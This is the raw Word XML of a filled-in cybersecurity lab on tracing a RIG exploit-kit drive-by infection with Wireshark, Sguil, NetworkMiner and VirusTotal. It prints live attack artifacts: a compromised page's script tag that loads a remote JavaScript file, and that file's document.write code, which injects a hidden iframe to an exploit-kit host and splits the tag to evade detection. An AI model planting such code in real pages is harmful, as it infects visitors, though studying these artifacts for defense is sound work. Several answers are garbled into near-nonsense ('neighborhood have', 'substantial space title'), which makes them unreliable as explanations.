          <w:numId w:val="5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Create a Hash for an Exported Malware File.</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We know that the user intended to access www.homeimprovement.com, but the site referred the user to other sites. Eventually files were downloaded to the host from a malware site. In this part of the lab, we will access the files that were downloaded and submit a file hash to VirusTotal to verify that a malicious file was downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5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Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and save the two text/html files and the application/x-shockwave-flash file to your home directory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5227320" cy="1301750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 45" descr="screenshot of http obje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descr="screenshot of http object list"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5227320" cy="1301750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5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Now that you have saved the three files to your home folder, test to see if one of the files matches a known hash value for malware at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Issue a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to look at the files saved in your home directory. The flash file has the word SeaMonkey near the beginning of the long filename. The filename begins with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%3fbiw=SeaMonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">command with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to filter out the filename with the pattern </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seamonkey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. The option </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> ignores the case distinction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls -l | grep -i seamonkey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-rw-r--r-- 1 analyst analyst 16261 Jun  9 05:50 %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMonkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5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Generate a SHA-1 hash for the SeaMonkey flash file with the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sha1sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> followed by the filename. Type the first 4 letters %3fb of the filename and then press the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> key to auto fill the rest of the filename. Press enter and sha1sum will compute a 40 digit long fixed length hash value. </w:t>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Highlight the hash value, right-click, and copy it. The sha1sum is highlighted in the example below. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>: Remember to use tab completion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">analyst@SecOnion:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sha1sum %3fbiw\=SeaMonkey.105qj67.406x7d8b3\&amp;yus\=SeaMonkey.78vg115.406g6d1r6\&amp;br_fl\=2957\&amp;oq\=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg\&amp;q\=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs\&amp;ct\=SeaMonkey\&amp;tuif\=1166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>97a8033303692f9b7618056e49a24470525f7290</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  %3fbiw=SeaMonkey.105qj67.406x7d8b3&amp;yus=SeaMo nkey.78vg115.406g6d1r6&amp;br_fl=2957&amp;oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg&amp;q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx fs&amp;ct=SeaMonkey&amp;tuif=1166</w:t>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You can also generate a hash value by using NetworkMiner. Navigate to Sguil and right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">) and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetworkMinor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to NetworkMinor. Select the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab. In this example, right-click the file with swf extension and select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Calculate MD5 / SHA1 / SHA256 hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>. Compare the SHA1 hash value with the one from the previous step. The SHA1 hash values should be the same.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>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Open a web browser and go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>virustotal.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab and enter the hash value to search for a match in the database of known malware hashes. VirusTotal will return a list of the virus detection engines that have a rule that matches this hash. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3844925" cy="2547620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 13" descr="screenshot of virustotal.com with a file hash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of virustotal.com with a file hash entered"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3844925" cy="2547620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5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Investigate the Detection and Details tabs. Review the information that is provided on this hash value.</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did VirusTotal tell you about this file? </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32 of 55 antivirus programs have rules that identify this hash as coming from a malware file.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5"/>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Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK Landing Sep 12 2016 T2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>) to pivot to Wireshark and examine the HTTP requests.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Are there any similarities to the earlier alerts?</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Yes, the alerts show GET, POST and GET requests to tyu.benme,com</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Are the files similar? Do you see any differences?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Yes, two text/html files and a flash file. The files names are different.</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6"/>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Create a SHA-1 hash of the SWF file as you did previously.</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Is this the same malware that was downloaded in the previous HTTP session?</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Yes. The two hashes coordinate indeed in spite of the fact that the filenames are distinctive.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7"/>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Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection.</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Why do they seem to be post-infection? </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All four alarms concern communication with the malware server.</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interesting about first alert in the last 4 alerts in the series?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Sends a UDP code to a ransomware checkin server</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type of communication is taking place in the second and third alerts in the series and what makes it suspicious?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They are DNS demands that are started from the neighborhood have; in any case, it is impossible that they are the result of ordinary client movement. They must be sent by the malware record. The .best space does not see like a substantial space title.</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8"/>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Go to virustotal.com and do a URL search for the .top domain used in the attack. </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result?</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It is a malicious domain, that still triggers alerts</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59"/>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Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them to your home folder.</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filenames if any?</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Yes. EE7EA-D39….</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2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Examine Exploit Artifacts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part, you will examine some of the documents that your exported from Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="60"/>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Security Onion, open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the remodeling-your-kitchen-cabinets.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> file using your choice of text editor. This webpage initiated the attack.</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Can you find the two places in the webpage that are part of the drive-by attack that started the exploit? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>: the first is in the &lt;head&gt; area and the second is in the &lt;body&gt; area of the page.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script tag within the header loads the JavaScript record dle_js.js from retrotip.visionurbana.com.ve. The iframe that loads substance from tyu.benme.com is characterized within the HTML body.</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CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;head profile="http://gmpg.org/xfn/11"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;title&gt;Remodeling Your Kitchen Cabinets | Home Improvement&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=rss2" title="Home Improvement latest posts" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?feed=comments-rss2" title="Home Improvement latest comments" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;link rel="shortcut icon" href="//www.homeimprovement.com/wp-content/themes/arras/images/favicon.ico" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;script type="text/javascript" src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;!-- All in One SEO Pack 2.3.2.3 by Michael Torbert of Semper Fi Web Design[291,330] --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;meta name="description"  content="Installing cabinets in a remodeled kitchen require some basic finish carpentry skills. Before starting any installation, it's a good idea to mark some level and" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;meta name="keywords"  content="cabinets,kitchen,kitchen cabints,knobs,remodel" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;some output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>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Open the dle_js.js file in choice of text editor and examine it. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>document.write('&lt;div class="" style="position:absolute; width:383px; height:368px; left:17px; top:-858px;"&gt;  &lt;div  style="" class=""&gt;&lt;a&gt;head&lt;/a&gt;&lt;a class="head-menu-2"&gt; &lt;/a&gt;&lt;iframe src="http://tyu.benme.com/?q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrttgWC&amp;biw=Amaya.81lp85.406f4y5l9&amp;oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&amp;yus=Amaya.110oz60.406a7e5q8&amp;br_fl=4109&amp;tuif=5364&amp;ct=Amaya" width=290 height=257 &gt;&lt;/ifr' +'ame&gt; &lt;a style=""&gt;&lt;/a&gt;&lt;/div&gt;&lt;a class="" style=""&gt;temp&lt;/a&gt;&lt;/div&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r>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does the file do?</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Javascript document.write() will write content to the webpage, creating an iframe, that takes the user to a URI at tyu.benme.com</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How does the code in the javascript file attempt to avoid detection? </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By splitting the end iframe tag into two piecesThe &lt;/ifr’ +’ame&gt;</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3"/>
          <w:numId w:val="61"/>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a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the filename.</w:t>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Examine the file and answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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kind of file it is?</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An HTML webpage</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some interesting things about the iframe? Does it call anything?</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It is hidden. It calls a start() function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>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What does the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>start()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
